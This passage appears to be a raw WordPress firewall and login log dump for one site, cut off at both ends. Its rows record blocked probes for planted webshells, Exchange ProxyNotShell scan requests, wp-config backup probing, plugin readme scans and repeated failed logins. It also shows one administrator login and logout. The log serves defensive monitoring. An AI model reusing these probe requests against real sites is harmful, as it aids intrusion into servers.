Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXBsdWdpbi9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134964,1700482747.203260,1700482747.178100,0x00000000000000000000FFFFB9A28217,0,200,0,0,0,'https://eckankar-colorado.org//wp-content/plugins/royal-elementor-addons/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"path\":\"Ly93cC1jb250ZW50L3BsdWdpbnMvcm95YWwtZWxlbWVudG9yLWFkZG9ucy9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134954,1700452974.182600,1700452974.075000,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134841,1700316918.160605,1700316918.102500,0x00000000000000000000FFFF5B5CFE59,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/images/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134842,1700317626.953658,1700317626.931600,0x00000000000000000000FFFF33DE9E0E,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134843,0.000000,1700318857.289363,0x00000000000000000000FFFF43CD0C92,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134844,1700320053.532187,1700320053.523400,0x00000000000000000000FFFF40E34E71,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Text/admin.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1RleHQvYWRtaW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134953,1700453003.364481,1700453003.325700,0x00000000000000000000FFFFB9D84606,0,403,0,0,0,'https://eckankar-colorado.org/404.shtml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"LzQwNC5zaHRtbA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134845,1700320052.963714,1700320052.941800,0x00000000000000000000FFFF40E34E71,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Text/index.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1RleHQvaW5kZXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134846,0.000000,1700321327.239552,0x00000000000000000000FFFFA123DA9D,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134847,0.000000,1700323798.481889,0x00000000000000000000FFFFD2CF5C18,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134848,0.000000,1700325057.712976,0x00000000000000000000FFFFBD449164,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://ambitpu.com/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0','loginFailInvalidUsername',NULL,NULL),(134849,0.000000,1700326250.891404,0x00000000000000000000FFFF82B44B2A,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134850,0.000000,1700328682.512485,0x00000000000000000000FFFFCB7C21D3,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134851,0.000000,1700331135.221935,0x00000000000000000000FFFF45A3BA86,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134852,0.000000,1700333572.508397,0x00000000000000000000FFFF334D4254,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134853,0.000000,1700335371.335220,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginOK',NULL,NULL),(134854,0.000000,1700336030.663973,0x00000000000000000000FFFF33532A32,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134855,0.000000,1700338479.532411,0x00000000000000000000FFFF05C407DC,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134856,0.000000,1700340602.607061,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=88a2861cb4','https://eckankar-colorado.org/wp-admin/themes.php?page=simple-custom-css.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','logout',NULL,NULL),(134857,0.000000,1700340933.678682,0x00000000000000000000FFFF33440BE3,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134858,1700341227.966234,1700341227.958200,0x00000000000000000000FFFFC0F1E01C,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?%40zdi%2FPowershell=',NULL,'Mozilla/5.0 zgrab/0.x','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(134859,0.000000,1700343405.276267,0x00000000000000000000FFFF9448D0C1,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134860,0.000000,1700348352.788017,0x00000000000000000000FFFF679D1BC5,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134861,0.000000,1700350832.606228,0x00000000000000000000FFFF45A3BA86,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134862,0.000000,1700353331.092017,0x00000000000000000000FFFF679ECEA7,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134863,0.000000,1700355838.278238,0x00000000000000000000FFFF5762ADFC,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134864,1700359801.857550,1700359801.802200,0x00000000000000000000FFFFC6C7713D,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?%40zdi%2FPowershell=',NULL,'Mozilla/5.0 zgrab/0.x','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(134865,0.000000,1700360884.188843,0x00000000000000000000FFFF334D4254,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134866,0.000000,1700363398.851450,0x00000000000000000000FFFF327466D3,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134867,1700364403.768622,1700364403.744100,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134948,0.000000,1700446341.097978,0x00000000000000000000FFFF3A88C79E,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://teamafrin.de/wp-login.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134949,1700446486.422385,1700446486.403500,0x00000000000000000000FFFF14CD8AC2,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php.bak',NULL,'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHAuYmFr\",\"path\":\"L3dwLWNvbmZpZy5waHAuYmFr\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134868,1700364403.768402,1700364403.744100,0x00000000000000000000FFFFD9A03CA2,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/paid-memberships-pro/readme.txt',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9wYWlkLW1lbWJlcnNoaXBzLXByby9yZWFkbWUudHh0\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134869,1700364558.321140,1700364558.297200,0x00000000000000000000FFFF33DE9E0E,0,403,0,0,0,'https://eckankar-colorado.org/style.php?sig=update&domain=51.79.124.111','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134870,0.000000,1700365940.225029,0x00000000000000000000FFFF2561E4BB,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134871,0.000000,1700368495.340655,0x00000000000000000000FFFF877D0109,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134872,0.000000,1700371050.337497,0x00000000000000000000FFFF33440BE3,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134873,0.000000,1700372283.867123,0x00000000000000000000FFFF14C65913,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134874,0.000000,1700372286.147020,0x00000000000000000000FFFF14C65913,0,200,0,0,0,'https://eckankar-colorado.org//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(134875,1700372408.757003,1700372408.726700,0x00000000000000000000FFFFB33C9378,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/elementor/readme.txt',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC51cmk=\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134950,1700446488.864178,1700446488.845600,0x00000000000000000000FFFF14CD8AC2,0,200,0,0,0,'https://eckankar-colorado.org/wp-config.php~',NULL,'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)','logged:waf','wp-config.php back-up probing','{\"learningMode\":0,\"failedRules\":\"logged|501\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbmZpZy5waHB+\",\"path\":\"L3dwLWNvbmZpZy5waHB+\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134876,1700372408.756749,1700372408.726700,0x00000000000000000000FFFFB33C9378,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/elementor/readme.txt',NULL,'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9lbGVtZW50b3IvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134877,1700372670.950628,1700372670.926100,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/wp-apxupx.php?apx=upx','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvd3AtYXB4dXB4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134945,1700445537.126393,1700445537.095900,0x00000000000000000000FFFF40E34E71,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/Requests/Text/admin.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1RleHQvYWRtaW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134878,1700372667.077460,1700372667.053300,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wp-apxupx.php?apx=upx','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1hcHh1cHgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134952,1700452594.586074,1700452594.559900,0x00000000000000000000FFFFC6C76929,0,403,0,0,0,'https://173.231.231.205/autodiscover/autodiscover.json?%40zdi%2FPowershell=',NULL,'Mozilla/5.0 zgrab/0.x','blocked:waf','Exchange Proxy(Not?)Shell CVE-2022–41040 and CVE-2022–41082','{\"learningMode\":0,\"failedRules\":\"511\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"path\":\"L2F1dG9kaXNjb3Zlci9hdXRvZGlzY292ZXIuanNvbg==\",\"category\":\"rce\",\"ssl\":1}'),(134958,1700461779.807259,1700461779.788600,0x00000000000000000000FFFFB9C4DC1A,0,200,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/hermit/readme.txt',NULL,'Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36','logged:waf','Readme.txt and debug.log scans','{\"learningMode\":0,\"failedRules\":\"logged|500\",\"paramKey\":\"cmVxdWVzdC5wYXRo\",\"paramValue\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9oZXJtaXQvcmVhZG1lLnR4dA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9oZXJtaXQvcmVhZG1lLnR4dA==\",\"category\":\"discovery-and-probing\",\"ssl\":1}'),(134879,1700372659.994405,1700372659.967500,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/wp-apxupx.php?apx=upx','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFweHVweC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134951,1700450392.630959,1700450392.572000,0x00000000000000000000FFFF5B5CF799,0,403,0,0,0,'https://eckankar-colorado.org/radio.php?imam=test','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 